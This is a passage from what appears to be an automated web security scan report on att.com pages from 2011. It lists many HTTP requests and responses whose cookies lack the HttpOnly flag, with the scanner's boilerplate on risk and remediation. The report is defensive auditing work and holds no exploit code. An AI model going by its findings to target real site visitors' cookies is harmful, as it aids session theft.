HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Expires: Tue, 06 Sep 2011 11:06:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 11:06:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=3FD1F714D87810D8547984A4C33E7EED; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:06:20 GMT; path=/ Content-Length: 61536
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"> <head> <title>International calling rates and packages - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /learn/ringtones-downloads/myatt-mobile.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Expires: Tue, 06 Sep 2011 11:06:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 11:06:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=3FF116BCD87810D85528BCD4C2B001A1; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:06:20 GMT; path=/ Content-Length: 54761
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"> <head> <title>Account Management App - myAT&T Mobile - W ...[SNIP]...
7. Cookie without HttpOnly flag setpreviousnext There are 90 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/forgotPasswordAction.olamexecute?forgotPasswordActionEvent=forgotPasswordStep1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/loginAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/passthroughAction.myworld HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/registrationAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.att.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /accounts/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 11:07:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=6AD5F370D87810D8B13BE982F040DE5E; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:07:32 GMT; path=/ Content-Length: 45366
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Manage Your AT&T Accounts - View & ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsl/shop/plansDirect.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equipment/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equipment/accessories/uverse-equipment.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equipment/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/additionalServices.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/article.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/billAndAccount.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/billingAndAccount.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /esupport/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/main.jsp?wtSlotClick=1-006E1O-0-3&cv=821 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/travelAndIntl.jsp?wtSlotClick=1-006E1O-0-2&cv=820 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/welcome.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gen/general?wtSlotClick=1-00679Z-0-5&pid=18121 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:20 GMT Content-Length: 24007 Connection: close Set-Cookie: JSID_coredisp=0000wB98saWwDGV2C8KXT0jvvaa:14cq1ik0g; Path=/
<!-- --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
DTAB=Tab=Bus; Expires=Mon, 05 Dec 2011 11:07:28 GMT; Path=/; Domain=.att.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gen/landing-pages?pid=9213 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:29 GMT Content-Length: 28750 Connection: close Set-Cookie: DTAB=Tab=Bus; Expires=Mon, 05 Dec 2011 11:07:28 GMT; Path=/; Domain=.att.com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <he ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /global/cms/u-verse/en_US/popups/channel-lineup.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /globalnav/includes/segmentation_menu.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /globalnav/includes/user_info.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/index.jsp?locale=es_US HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/virtual/zipentry.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /learningcenter/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html lang="en"> <head> <title>4G Speed from AT&T - AT&T 4G with HSPA+ and LTE ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/apps/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html lang=""> <head> <title>AT&T App Center - Cell Phone Apps & iPhone ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/bundles/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en_US"> <head> <meta NAME="DCS ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/bundles/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en_US"> <head> <meta NAME="DCS ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/help HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.att.com/shop/help/">htt ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/home-phone/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/home-phone/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/internet/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/internet/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/popups/en_US/marquee_online_offer_details_legal.html|600|300 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/special-offers/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/special-offers/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/tv/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/tv/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/u-verse/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/u-verse/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/devices/lg-thrill-4g.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/plans/messaging-plans.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html lang="en"> <head> <title>AT&T Messaging Unlimited Plan - Mobile to An ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AT&T Site Map ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /storelocator/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 11:07:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=6AB640D4D87810D8CCA58681F93E16CD; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:07:31 GMT; path=/ Content-Length: 62600
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/911.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/advanced-features.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/battery-backup.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/default.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/home-alarm.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/international-rates.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/internet-landing.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/phone-landing.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/safety-security.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/storage-convenience.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/uverse-difference.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/shop/channel-lineup.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/shop/customize.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
